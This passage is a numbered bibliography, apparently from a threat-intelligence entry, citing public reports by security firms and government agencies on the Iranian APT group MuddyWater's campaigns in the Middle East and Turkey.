  4. ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.
  5. ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.
  6. Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.
  7. FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.
  8. Malhotra, A. and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.
  9. Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.
  10. Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.